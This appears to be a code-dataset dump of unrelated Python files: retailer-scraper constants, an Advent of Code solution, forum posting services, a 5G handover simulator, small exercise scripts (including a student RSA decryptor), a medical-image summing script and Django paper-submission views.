\n \n Variables:\n STORE_URLS\n KEYWORD\n HEADERS\n'''\n\nSTORE_URLS = {'walmart': 'https://www.walmart.com.mx/sitemap.xml',\n 'sams': 'https://www.sams.com.mx/siteindex.xml',\n 'liverpool': 'https://www.liverpool.com.mx/Sitemap/index.xml',\n 'costco': 'https://www.costco.com.mx/sitemap.xml',\n 'elektra': 'https://www.elektra.com.mx/sitemap.xml',\n 'homedepot': 'https://www.homedepot.com.mx/sitemap_10351.xml'}\n\nKEYWORD = {'walmart': 'product',\n 'sams': 'product',\n 'liverpool': 'detail',\n 'costco': 'product',\n 'elektra': 'product',\n 'homedepot': 'sitemap'}\n\nHEADERS = {'accept': 'application/json, text/javascript, */*; q=0.01',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'es-419,es;q=0.9',\n 'sec-ch-ua': '?0',\n 'sec-fetch-dest': 'empty',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-site': 'same-origin',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 OPR/74.0.3911.107',\n 'x-requested-with': 'XMLHttpRequest'}\n\nLIVERPOOL_SERVICE_PAYLOAD = {'accept': 'application/json, text/plain, */*',\n 'accept-encoding': 'gzip, deflate, br',\n 'Accept-Language': 'en-US,en;q=0.5',\n 'Content-Length': '505',\n 'Content-Type': 'application/json;charset=utf-8',\n 'Host': 'www.liverpool.com.mx',\n 'Origin': 'https://www.liverpool.com.mx',\n 'Referer': '',\n 'sec-fetch-dest': 'empty',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-site': 'same-origin',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 OPR/74.0.3911.107'}\n","repo_name":"Modular2022/price-tracker-system","sub_path":"scrapper/stores/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"6636876527","text":"with open(\"input.txt\") as f:\r\n number_length = len(\"110000000001\")\r\n lines = f.readlines()\r\n frequencies = [dict() for _ in range(number_length)]\r\n for line in lines:\r\n for bit in range(number_length):\r\n frequencies[bit][line[bit]] = frequencies[bit].get(line[bit], 0) + 1\r\n # frequencies collected\r\n gamma_string = \"\"\r\n epsilon_string = \"\"\r\n for bit in range(number_length):\r\n if frequencies[bit].get(\"0\", 0) > frequencies[bit].get(\"1\", 0):\r\n gamma_string += \"0\"\r\n epsilon_string += \"1\"\r\n else:\r\n gamma_string += \"1\"\r\n epsilon_string += \"0\"\r\n gamma_rate = int(gamma_string, 2)\r\n epsilon_rate = int(epsilon_string, 2)\r\n print(gamma_string, epsilon_string)\r\n print(gamma_rate * epsilon_rate)\r\n","repo_name":"krzyssikora/advent_of_code","sub_path":"aoc_2021/03_1_diagnostic.py","file_name":"03_1_diagnostic.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11673078471","text":"from datetime import datetime\nfrom typing import Tuple\n\nfrom ...database import db\nfrom ...events.board import (\n BoardPostingCreated,\n BoardPostingHidden,\n BoardPostingUnhidden,\n BoardPostingUpdated,\n)\nfrom ...typing import UserID\n\nfrom ..user import service as user_service\nfrom ..user.transfer.models import User\n\nfrom .aggregation_service import aggregate_topic\nfrom .models.posting import Posting as DbPosting\nfrom . import posting_query_service\nfrom . 
import topic_query_service\nfrom .transfer.models import PostingID, TopicID\n\n\ndef create_posting(\n topic_id: TopicID, creator_id: UserID, body: str\n) -> Tuple[DbPosting, BoardPostingCreated]:\n \"\"\"Create a posting in that topic.\"\"\"\n topic = topic_query_service.get_topic(topic_id)\n creator = _get_user(creator_id)\n\n posting = DbPosting(topic, creator.id, body)\n db.session.add(posting)\n db.session.commit()\n\n aggregate_topic(topic)\n\n event = BoardPostingCreated(\n occurred_at=posting.created_at,\n initiator_id=creator.id,\n initiator_screen_name=creator.screen_name,\n board_id=topic.category.board_id,\n posting_id=posting.id,\n posting_creator_id=creator.id,\n posting_creator_screen_name=creator.screen_name,\n topic_id=topic.id,\n topic_title=topic.title,\n topic_muted=topic.muted,\n url=None,\n )\n\n return posting, event\n\n\ndef update_posting(\n posting_id: PostingID, editor_id: UserID, body: str, *, commit: bool = True\n) -> BoardPostingUpdated:\n \"\"\"Update the posting.\"\"\"\n posting = _get_posting(posting_id)\n editor = _get_user(editor_id)\n\n now = datetime.utcnow()\n\n posting.body = body.strip()\n posting.last_edited_at = now\n posting.last_edited_by_id = editor.id\n posting.edit_count += 1\n\n if commit:\n db.session.commit()\n\n posting_creator = _get_user(posting.creator_id)\n return BoardPostingUpdated(\n occurred_at=now,\n initiator_id=editor.id,\n initiator_screen_name=editor.screen_name,\n board_id=posting.topic.category.board_id,\n posting_id=posting.id,\n posting_creator_id=posting_creator.id,\n posting_creator_screen_name=posting_creator.screen_name,\n topic_id=posting.topic.id,\n topic_title=posting.topic.title,\n editor_id=editor.id,\n editor_screen_name=editor.screen_name,\n url=None,\n )\n\n\ndef hide_posting(\n posting_id: PostingID, moderator_id: UserID\n) -> BoardPostingHidden:\n \"\"\"Hide the posting.\"\"\"\n posting = _get_posting(posting_id)\n moderator = _get_user(moderator_id)\n\n now = datetime.utcnow()\n\n posting.hidden = True\n posting.hidden_at = now\n posting.hidden_by_id = moderator.id\n db.session.commit()\n\n aggregate_topic(posting.topic)\n\n posting_creator = _get_user(posting.creator_id)\n event = BoardPostingHidden(\n occurred_at=now,\n initiator_id=moderator.id,\n initiator_screen_name=moderator.screen_name,\n board_id=posting.topic.category.board_id,\n posting_id=posting.id,\n posting_creator_id=posting_creator.id,\n posting_creator_screen_name=posting_creator.screen_name,\n topic_id=posting.topic.id,\n topic_title=posting.topic.title,\n moderator_id=moderator.id,\n moderator_screen_name=moderator.screen_name,\n url=None,\n )\n\n return event\n\n\ndef unhide_posting(\n posting_id: PostingID, moderator_id: UserID\n) -> BoardPostingUnhidden:\n \"\"\"Un-hide the posting.\"\"\"\n posting = _get_posting(posting_id)\n moderator = _get_user(moderator_id)\n\n now = datetime.utcnow()\n\n # TODO: Store who un-hid the posting.\n posting.hidden = False\n posting.hidden_at = None\n posting.hidden_by_id = None\n db.session.commit()\n\n aggregate_topic(posting.topic)\n\n posting_creator = _get_user(posting.creator_id)\n event = BoardPostingUnhidden(\n occurred_at=now,\n initiator_id=moderator.id,\n initiator_screen_name=moderator.screen_name,\n board_id=posting.topic.category.board_id,\n posting_id=posting.id,\n posting_creator_id=posting_creator.id,\n posting_creator_screen_name=posting_creator.screen_name,\n topic_id=posting.topic.id,\n topic_title=posting.topic.title,\n moderator_id=moderator.id,\n 
moderator_screen_name=moderator.screen_name,\n url=None,\n )\n\n return event\n\n\ndef delete_posting(posting_id: PostingID) -> None:\n \"\"\"Delete a posting.\"\"\"\n db.session.query(DbPosting) \\\n .filter_by(id=posting_id) \\\n .delete()\n\n db.session.commit()\n\n\ndef _get_posting(posting_id: PostingID) -> DbPosting:\n return posting_query_service.get_posting(posting_id)\n\n\ndef _get_user(user_id: UserID) -> User:\n return user_service.get_user(user_id)\n","repo_name":"FakoorCo/byceps","sub_path":"byceps/services/board/posting_command_service.py","file_name":"posting_command_service.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"71963001079","text":"import fivegmodules.core\nimport numpy as np\n\n__all__ = ['Handover', 'A3Handover', 'HeuristicHandover']\n\nclass Handover:\n def __init__(self):\n pass\n\n def triggerMeasurement(self, device, targetBS):\n raise NotImplementedError\n \n def sendMeasurementReport(self, device, targetBS):\n raise NotImplementedError\n \n def handoverFailure(self, device):\n raise NotImplementedError\n \n def switchBaseStation(self, device, targetBS):\n raise NotImplementedError\n\nclass A3Handover(Handover):\n def __init__(self):\n super(A3Handover, self).__init__()\n self.handoverExecutionFlag = False\n self.handoverPreparationFlag = False\n self.x2Delay = 5 #milliseconds\n self.handoverCount = 0\n self.handoverPreparationStart = 0\n self.handoverFlag = False\n\n ### To solve composition problems\n self.parent = self\n #self.handoverDecisionFunction = \n\n def handovercause(self, device, targetBS):\n if device.lineofsight[device.servingBS][device.env.now] == 0:\n # Handover due to non line of sight condition\n handoverCause = 0\n\n elif (device.calcDist(device.scenarioBasestations[targetBS]) \n < device.calcDist(device.scenarioBasestations[device.servingBS])):\n # Handover due to user mobility, i.e., closer to target BS than to Serving BS\n handoverCause = 1\n\n elif device.listedRSRP[targetBS] > device.listedRSRP[device.servingBS]:\n # Handover due to severe channel fluctuations\n handoverCause = 2\n\n return handoverCause\n\n def loghandovercause(self, device, handoverCause):\n if handoverCause == 0:\n # Handover due to non line of sight condition\n try:\n device.kpi.log['HOC000'] += 1\n except KeyError:\n device.kpi.log['HOC000'] = 1\n\n elif handoverCause == 1:\n # Handover due to user mobility, i.e., closer to target BS than to Serving BS\n try:\n device.kpi.log['HOC001'] += 1\n except KeyError:\n device.kpi.log['HOC001'] = 1\n\n elif handoverCause == 2:\n # Handover due to severe channel fluctuations\n try:\n device.kpi.log['HOC002'] += 1\n except KeyError:\n device.kpi.log['HOC002'] = 1\n\n else:\n # Non specified reason to handover trigger\n try:\n device.kpi.log['HOC099'] += 1\n except KeyError:\n device.kpi.log['HOC099'] = 1\n\n def loghandoverfailure(self, device, failurecode, n):\n try:\n device.kpi.log[failurecode] += n\n except KeyError:\n device.kpi.log[failurecode] = n\n\n def triggerMeasurement(self, device, targetBS):\n counterTTT = 0\n #print(device.env.now, device.sync, device.measOccurring, self.handoverFlag) \n \n if not device.sync:\n self.handoverFailure(device)\n\n # First, check if another measurement is not in progress\n elif not device.measOccurring and not self.handoverFlag:\n # If it is not, check whether it is an A3 event or not\n if (\n (\n device.listedRSRP[targetBS] \n - device.networkParameters.handoverHysteresys\n )\n >= 
(\n device.listedRSRP[device.servingBS] \n + device.networkParameters.handoverOffset\n + device.networkParameters.handoverHysteresys\n )\n ):\n\n # Given that it is an A3 event, triggers the measurement\n device.measOccurring = True\n device.triggerTime = device.env.now\n self.parent.handoverCount += 1\n\n handoverCause = self.handovercause(device,targetBS)\n \n while counterTTT < device.networkParameters.timeToTrigger:\n yield device.env.timeout(device.networkParameters.timeToMeasure)\n counterTTT += device.networkParameters.timeToMeasure\n \n if device.sync:\n # The A3 condition still valid? If not, stop the timer\n if (\n (\n device.listedRSRP[targetBS] \n - device.networkParameters.handoverHysteresys\n )\n <= (\n device.listedRSRP[device.servingBS] \n + device.networkParameters.handoverOffset\n + device.networkParameters.handoverHysteresys\n )\n ):\n\n # Too earlier handover attempt, might have been just\n # a channel fluctuation\n self.loghandoverfailure(device,'HOF000',1)\n break\n else:\n # Too late handover, user got out-sync in the middle of it\n self.loghandoverfailure(device,'HOF001',1)\n\n device.kpi.handover +=1\n self.handoverFailure(device)\n break\n\n if counterTTT == device.networkParameters.timeToTrigger:\n self.handoverFlag = True\n device.kpi.handover +=1\n \n if device.sync:\n self.loghandovercause(device, handoverCause)\n device.env.process(self.parent.sendMeasurementReport(device, targetBS))\n \n # Too late handover, user got out-sync in the middle of it\n # and will not be able to communicate with Serving BS to complete\n else:\n self.loghandoverfailure(device,'HOF002',1)\n self.handoverFailure(device)\n\n device.measOccurring = False\n device.triggerTime = 0\n \n \n \n def sendMeasurementReport(self, device, targetBS):\n\n #Check if it is not a reassociation\n #if device.listedRSRP[device.servingBS] != None:\n if device.sync:# and (device.servingBSSINR() > device.networkParameters.qualityOut):\n\n # Holds the time to send the RRC:Measurement Report\n yield device.env.timeout(device.networkParameters.RRCMsgTransmissionDelay)\n\n # Check if it is a pingpong, just for kpi assessment\n if device.lastBS.count(targetBS)>0:\n device.kpi.pingpong += 1\n\n #Base stations processing the handover at X2 interface\n self.handoverPreparationFlag = True\n self.handoverPreparationStart = device.env.now\n\n yield device.env.timeout(\n device.scenarioBasestations[device.servingBS].RRCprocessingDelay\n + device.scenarioBasestations[device.servingBS].handoverDecisionDelay\n + 2*self.x2Delay\n + 2*device.scenarioBasestations[targetBS].X2processingDelay\n + device.scenarioBasestations[targetBS].admissionControlDelay)\n\n # Switch to the new BS\n device.env.process(self.switchBaseStation(device, targetBS))\n '''\n else:\n try:\n device.kpi.log['HOF002'] += 1\n except KeyError:\n device.kpi.log['HOF002'] = 1\n self.handoverFailure(device)\n '''\n \n def handoverFailure(self, device):\n device.lastBS.append(device.servingBS)\n device.servingBS = None\n device.reassociationFlag = False\n device.kpi.handoverFail += 1\n \n #device.kpi.association[-1].append(device.env.now+0.2)\n self.handoverFlag = False\n device.sync = False\n\n if self.handoverExecutionFlag:\n device.kpi.association[-1].append(device.env.now)\n\n try:\n device.kpi.outofsync.append([device.env.now])\n except:\n device.kpi.outofsync = [[device.env.now]]\n\n\n def switchBaseStation(self, device, targetBS):\n if device.sync:\n device.lastBS.append(device.servingBS)\n\n # yields for receiving HO Command RRC message and process 
this message\n yield device.env.timeout(device.networkParameters.RRCMsgTransmissionDelay\n + device.handoverCommandProcDelay)\n\n self.handoverPreparationFlag = False\n\n # Calculates Handover Preparation time\n try:\n device.kpi.log['HOP'].append(device.env.now \n - self.handoverPreparationStart)\n except KeyError:\n device.kpi.log['HOP'] = [device.env.now \n - self.handoverPreparationStart]\n\n '''\n # yields untill the downlink sync is completed\n yield device.env.timeout(\n device.scenarioBasestations[targetBS].nextSSB + \n device.networkParameters.SSBurstDuration - device.env.now\n )\n #'''\n\n # Receiving handover command and turning to RRC Idle untill uplink \n # sync with target BS\n if device.sync: #and not device.T310running:\n disassociation = device.env.now\n device.sync = False\n\n self.handoverExecutionFlag = True\n\n yield device.env.timeout(device.freqReconfigDelay)\n\n '''\n The time gap between the disassociation from the Serving BS to the\n target BS is known as handover interruption time (HIT) and it is\n the for the UE to get synced with the target BS. There is no data\n connection during this time interval, so the UE remains unsynced\n '''\n\n # yields untill the uplink sync is completed and a RACH preamble is sent\n yield device.env.timeout(\n device.scenarioBasestations[targetBS].nextRach + \n device.networkParameters.SSBurstDuration - device.env.now\n )\n\n # Wait for receiving uplink Uplink Grant\n yield device.env.timeout(\n device.scenarioBasestations[targetBS].preambleDetectionDelay\n + device.scenarioBasestations[targetBS].uplinkAllocationDelay\n + device.networkParameters.RRCMsgTransmissionDelay\n + device.uplinkAllocationProcessingDelay\n )\n\n # yields to send RRC Reconfiguration complete message\n yield device.env.timeout(device.networkParameters.RRCMsgTransmissionDelay)\n\n # Checks whether the HO Complete will be successfully sent/received \n # If not, the handover fails\n #if device.listedRSRP[targetBS] > device.networkParameters.qualityOut: \n device.servingBS = targetBS\n if device.servingBSSINR() > device.networkParameters.qualityOut: \n\n # Once the RRC:HO complete is recieved it needs to be processed\n yield device.env.timeout(device.scenarioBasestations[targetBS].RRCprocessingDelay)\n\n # Now the UE is up and downlink synced\n device.sync = True\n self.handoverFlag = False\n device.kpi.association.append(\n [list(device.scenarioBasestations.keys()).index(device.servingBS), device.env.now])\n device.kpi.association[-2].append(disassociation)\n\n try:\n device.kpi.log['HIT'].append(device.env.now - disassociation)\n except KeyError:\n device.kpi.log['HIT'] = [device.env.now - disassociation]\n\n\n else:\n # Handover fail due to not received handover complete\n self.loghandoverfailure(device,'HOF004',1)\n self.handoverFailure(device)\n self.handoverExecutionFlag = False\n\n # Failed to receive Handover Command\n else:\n self.loghandoverfailure(device,'HOF003',1)\n self.handoverFailure(device)\n\n self.handoverPreparationFlag = False\n\n\n\nclass HeuristicHandover(Handover):\n def __init__(self):\n super(HeuristicHandover, self).__init__()\n self.a3 = A3Handover()\n ### To solve composition problems\n self.a3.parent = self\n\n self.decisionHelper = None\n self.decisionData = None\n\n self.handoverExecutionFlag = False\n self.handoverPreparationFlag = False\n self.x2Delay = 5 #milliseconds\n self.handoverCount = 0\n self.handoverPreparationStart = 0\n self.handoverFlag = False\n\n\n def triggerMeasurement(self, device, targetBS):\n return 
self.a3.triggerMeasurement(device, targetBS)\n \n\n\n def sendMeasurementReport(self, device, targetBS):\n if device.sync:\n # Holds the time to send the RRC:Measurement Report\n yield device.env.timeout(device.networkParameters.RRCMsgTransmissionDelay)\n\n # Check if it is a pingpong, just for kpi assessment\n if device.lastBS.count(targetBS)>0:\n device.kpi.pingpong += 1\n\n #Base stations processing the handover at X2 interface\n self.handoverPreparationFlag = True\n self.a3.handoverPreparationFlag = True\n\n self.handoverPreparationStart = device.env.now\n\n yield device.env.timeout(\n device.scenarioBasestations[device.servingBS].RRCprocessingDelay\n + device.scenarioBasestations[device.servingBS].handoverDecisionDelay)\n\n self.decisionData = self.decisionHelper.getData(device, targetBS)\n if (self.decisionHelper.getDecision(*self.decisionData)):\n yield device.env.timeout(\n + 2*self.x2Delay\n + 2*device.scenarioBasestations[targetBS].X2processingDelay\n + device.scenarioBasestations[targetBS].admissionControlDelay)\n\n # Switch to the new BS\n device.env.process(self.switchBaseStation(device, targetBS))\n\n else:\n self.handoverPreparationFlag = False\n self.a3.handoverPreparationFlag = False\n\n self.handoverFlag = False\n self.a3.handoverFlag = False\n\n device.kpi.handover -=1\n\n yield device.env.timeout(\n device.scenarioBasestations[device.servingBS].RRCprocessingDelay\n + device.scenarioBasestations[device.servingBS].handoverDecisionDelay)\n \n def handoverFailure(self, device):\n return self.a3.handoverFailure(device)\n \n def switchBaseStation(self, device, targetBS):\n return self.a3.switchBaseStation(device, targetBS)\n\nclass DecisionHelper:\n def __init__(self):\n pass\n\n def getDecision(self,*args,**kwargs):\n raise NotImplementedError\n\n def getData(self,device,targetBS):\n raise NotImplementedError\n\nclass PredictionHelper(DecisionHelper):\n def __init__(self):\n super(PredictionHelper, self).__init__()\n self.prediction_window = 0\n self.deteriorate=False\n\n def getDecision(self,serving_prediction, target_prediction):\n serving_score = self.scoringFunction(serving_prediction)\n target_score = self.scoringFunction(target_prediction)\n #print(serving_score, target_score)\n\n if target_score <= serving_score:\n return True\n else:\n return False\n\n def getData(self, device, targetBS):\n init = device.env.now\n end = device.env.now + self.prediction_window\n if not self.deteriorate:\n s_prediction = device.lineofsight[device.servingBS][init:end]\n t_prediction = device.lineofsight[targetBS][init:end]\n return [s_prediction, t_prediction]\n\n\n def scoringFunction(self, prediction):\n score = 0\n burst = False\n n=0\n\n for p, i in enumerate(reversed(prediction)):\n if i == 1:\n burst=False\n n=0\n else:\n burst=True\n n+=1\n\n if burst:\n score += (1+np.log2(p+1))*(2**n)\n\n return np.ceil(score)\n\n\nclass ProbabilityHelper(DecisionHelper):\n def __init__(self):\n super(ProbabilityHelper, self).__init__()\n self.ho_prob = 0\n self.step = 0\n\n def getDecision(self):\n if np.random.rand() <= self.ho_prob:\n return True\n else:\n return False\n\n def getData(self, device, targetBS):\n if device.lastBS == targetBS:\n self.updateProb(-1)\n else:\n self.updateProb(+1)\n\n return None\n\n def updateProb(self, sense=1):\n self.ho_prob += 
sense*self.step\n","repo_name":"davibrilhante/reliability-optimization","sub_path":"fivegmodules/handover.py","file_name":"handover.py","file_ext":"py","file_size_in_byte":17281,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"3495292771","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the cutTheSticks function below.\ndef cutTheSticks(arr):\n    lst=[];\n    min_element=0;\n    \n    while True:\n        lst.append(len(arr));\n        min_element=min(arr);\n        arr=[x for x in arr if x!=min_element];\n        arr=[x-min_element for x in arr];\n        if arr.count(min_element)==len(arr):\n            if len(arr)>0:\n                lst.append(len(arr));\n            break;\n    \n\n    #lst.append()\n    return lst;\n\nif __name__ == '__main__':\n    fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n    n = int(input())\n\n    arr = list(map(int, input().rstrip().split()))\n\n    result = cutTheSticks(arr)\n\n    fptr.write('\\n'.join(map(str, result)))\n    fptr.write('\\n')\n\n    fptr.close()\n\n","repo_name":"balachandar-paulraj/Hacker-Rank","sub_path":"Cut_The_Sticks.py","file_name":"Cut_The_Sticks.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36510243901","text":"import argparse\r\nimport random\r\n\r\ndef parse_file(arg_file):\r\n    with open(arg_file) as f:\r\n        content = f.readlines()\r\n\r\n    return content\r\n\r\nclass RSA(object):\r\n\r\n    def __init__(self, N, e_or_d, output_file):\r\n        self.N = N\r\n        self.n = n\r\n        self.e_or_d = e_or_d\r\n        self.output_file = output_file\r\n\r\n    def decrypt(self, number_to_decrypt):\r\n        decrypted_number = pow(number_to_decrypt, self.e_or_d, self.N)\r\n        self.write_to_file(decrypted_number)\r\n    \r\n    def unpad(self,padded):\r\n        r = random.getrandbits(n // 2)\r\n        ln = len(str(r))\r\n        return padded[ln+2:]\r\n\r\n    def write_to_file(self, result):\r\n        with open(self.output_file, 'w') as f:\r\n            f.write(str(result) + '\\n')\r\n\r\nif __name__ == \"__main__\":\r\n    parser = argparse.ArgumentParser()\r\n    required_group = parser.add_argument_group('required arguments')\r\n\r\n    required_group.add_argument(\"-k\", \r\n                        \"--key_file\", \r\n                        help=\"specifies a file storing a valid RSA key in the example format\",\r\n                        required=True)\r\n\r\n    required_group.add_argument(\"-i\",\r\n                        \"--input\",\r\n                        help=\"specifies the path of the file containing an integer in Zn in String form (base 10)\",\r\n                        required=True)\r\n\r\n    required_group.add_argument(\"-o\",\r\n                        \"--output\",\r\n                        help=\"specifies the path of the file where the resulting output is stored in String form (base 10)\",\r\n                        required=True)\r\n\r\n    args = parser.parse_args()\r\n    key_file_contents = parse_file(args.key_file)\r\n    number = parse_file(args.input)[0]\r\n    n = int(key_file_contents[0])\r\n    N = key_file_contents[1]\r\n    e_or_d = key_file_contents[2]\r\n    number = int(number,16)\r\n    rsa = RSA(int(N), int(e_or_d), args.output)\r\n    pd = rsa.unpad(number)\r\n    rsa.decrypt(int(pd))","repo_name":"TygaMike/cs483pa3","sub_path":"rsa-dec.py","file_name":"rsa-dec.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"36265599003","text":"import os\nimport glob\nimport numpy as np\nimport SimpleITK as sitk\nimport nibabel as nb\nimport itk\n\n\"\"\"\nevery patient has a different number of lymph node data\ncollect all data, sum and save in nii.gz \nfor convenience\n\nuse the nibabel library to save the affine information 
together\n(voxel size, origin)\n\"\"\"\n\nfolder_path = glob.glob('E:/HSE/LungCancerData/test/*/')\n\n# With Nibabel\nfor i in folder_path:\n lymph_path = glob.glob(i + '*lymph_cut.nii.gz')\n # sample_img = nb.load(lymph_path[0])\n sum_lymph = np.zeros((160, 128, 80))\n # sum_lymph = nb.Nifti1Image(zero_arr, sample_img.affine)\n for l in lymph_path:\n print(f'lymph file = {l}')\n lymph_img = nb.load(l)\n lymph_affine = lymph_img.affine\n # print(f'lymph_affine = {lymph_affine}')\n lymph_data = lymph_img.get_fdata()\n # print(f'type sum_lymph = {sum_lymph.shape}, type lymph_img = {lymph_img.shape}')\n # type sum_lymph = (160, 128, 80), type lymph_img = (160, 128, 80)\n sum_lymph += lymph_data\n\n sum_lymph[sum_lymph > 1] = 1\n file_name = 'lymph_cut_sum.nii.gz'\n os.chdir(i)\n if len(lymph_path) != 0:\n nb.Nifti1Image(sum_lymph, lymph_affine).to_filename(file_name)\n print(f'{file_name} saved in {os.getcwd()}')\n else:\n print(f'No lymph node in {os.getcwd()}')\n # break\n\n# WIth SimpleITK\n# for i in folder_path:\n# lymph_path = glob.glob(i + '*lymph_cut.nii.gz')\n# zero_arr = np.zeros((80, 128, 160))\n# sum_lymph = sitk.GetImageFromArray(zero_arr)\n# for l in lymph_path:\n# print(f'lymph file = {l}')\n# lymph_img = sitk.ReadImage(l)\n# lymph_origin = lymph_img.GetOrigin()\n# print(f'lymph_origin = {lymph_origin}')\n# # lymph_img = lymph_img[::-1, :, :]\n# lymph_data = sitk.GetArrayFromImage(lymph_img)\n# print(f'type sum_lymph = {sum_lymph.GetSize()}, type lymph_img = {lymph_img.GetSize()}')\n# sum_lymph += lymph_img\n#\n# sum_lymph[sum_lymph > 1] = 1\n# file_name = 'lymph_cut_sum.nii.gz'\n# os.chdir(i)\n# if len(lymph_path) != 0:\n# sum_lymph_img = sitk.GetImageFromArray(sum_lymph)\n# # sitk.WriteImage(sum_lymph_img[:, :, :], file_name)\n# # sitk.WriteImage(sum_lymph[:, :, :], file_name)\n# print(f'{file_name} saved in {os.getcwd()}')\n# else:\n# print(f'No lymph node in {os.getcwd()}')\n# # break\n# # print(f'lymph path = {i}')\n\n\n# def collect_lymph(lymph_path):\n# patient","repo_name":"hse801/Medical_Segmentation","sub_path":"dataprocessing/sum_lymph.py","file_name":"sum_lymph.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37671005711","text":"import json\nimport re\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect, JsonResponse\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models import Q\n\nfrom .forms import AuthorForm, PaperStep1Form, AuthorForm2\nfrom .models import Author, Company\nfrom .models import AuthorCompany\nfrom .models import Paper, PaperAuthor\nfrom . 
import util\nfrom .data import provinces\nfrom .country_map import all_map as country_map\n\n\n# Create your views here.\n\n\ndef add_step1(request):\n if request.method == 'POST':\n form = PaperStep1Form(request.POST)\n if form.is_valid():\n values = form.cleaned_data\n request.session['paper'] = values\n flag = True\n\n if values['pifpub'] == 'true':\n try:\n if re.match(r'^\\s+$', values['pplace']):\n flag = False\n if re.match(r'^\\s+$', values['ppub']):\n flag = False\n if re.match(r'^\\s+$', str(values['pyear'])):\n flag = False\n if re.match(r'^\\s+$', str(values['ppage'])):\n flag = False\n if re.match(r'^\\s+$', values['ppath']):\n flag = False\n except:\n flag = False\n\n if flag:\n return HttpResponseRedirect(reverse('polls:add_step2'))\n else:\n paper = request.session.get('paper', {})\n form = PaperStep1Form(initial={\n 'pname': paper.get('pname', ''),\n 'ptype': paper.get('ptype', ''),\n 'pplace': paper.get('pplace', ''),\n 'ppub': paper.get('ppub', ''),\n 'pyear': paper.get('pyear', ''),\n 'ppage': paper.get('ppage', ''),\n 'ppath': paper.get('ppath', ''),\n })\n return render(request, 'polls/add-step1.html', {'form': form})\n\n\ndef add_step2(request):\n if request.session.get('paper', None) is None:\n raise Http404()\n\n authors = request.session.get('authors', [])\n\n return render(request, 'polls/add-step2.html', {'authors': json.dumps(authors)})\n\n\ndef add_step3(request):\n s = {\"计算机程序[CP]\", \"电子公告[EB]\", \"数据库[DB]\"}\n request.session['paper']['showPath'] = request.session['paper']['ptype'] in s\n return render(request, 'polls/add-step3.html', {\n 'paper': request.session['paper'],\n 'authors': request.session['authors']\n })\n\n\ndef save_paper(request, conti=False):\n _paper = request.session['paper']\n _paper['pifpub'] = (_paper['pifpub'] == 'true')\n authors = request.session['authors']\n if _paper['pyear'] is None:\n _paper['pyear'] = 0\n if _paper['ppage'] is None:\n _paper['ppage'] = 0\n paper = Paper(**_paper)\n paper.save()\n\n for i, a in enumerate(authors):\n author = Author.objects.get(amail=a['amail'])\n company = Company.objects.filter(cnamech1=a['cnamech1'], cnamech2=a['cnamech2'])[0]\n pa = PaperAuthor(\n author=author,\n company=company,\n paper=paper,\n paorder=i+1,\n pacommunication=a.get('isComm', False),\n pacorder=a.get('commOrder', 0)\n )\n pa.save()\n del request.session['paper']\n del request.session['authors']\n if not conti:\n return HttpResponseRedirect(reverse('login:tables'))\n else:\n return HttpResponseRedirect(reverse('polls:add_step1'))\n\n\ndef get_author(request):\n if request.method != 'GET':\n raise Http404()\n name = request.GET.get('name', '')\n if re.match(r'^\\s*$', name):\n return JsonResponse({\n 'success': False,\n 'message': '名字不能为空',\n })\n try:\n author = Author.objects.get(anamech=name)\n except ObjectDoesNotExist:\n return JsonResponse({\n 'success': False,\n 'message': '不存在该作者,请添加'\n })\n\n try:\n ac = AuthorCompany.objects.get(author=author)\n return JsonResponse({\n 'success': True,\n 'val': {\n 'anamech': author.anamech,\n 'anameen': author.anameen,\n 'amail': author.amail,\n 'cnamech1': ac.company.cnamech1,\n 'cnamech2': ac.company.cnamech2,\n }\n })\n except ObjectDoesNotExist:\n return JsonResponse({\n 'success': True,\n 'val': {\n 'anamech': author.anamech,\n 'anameen': author.anameen,\n 'amail': author.amail,\n }\n })\n\n\ndef author_list(request):\n if request.method != 'GET':\n raise Http404()\n prefix = request.GET.get('prefix', '')\n if prefix == '':\n raise Http404()\n authors = 
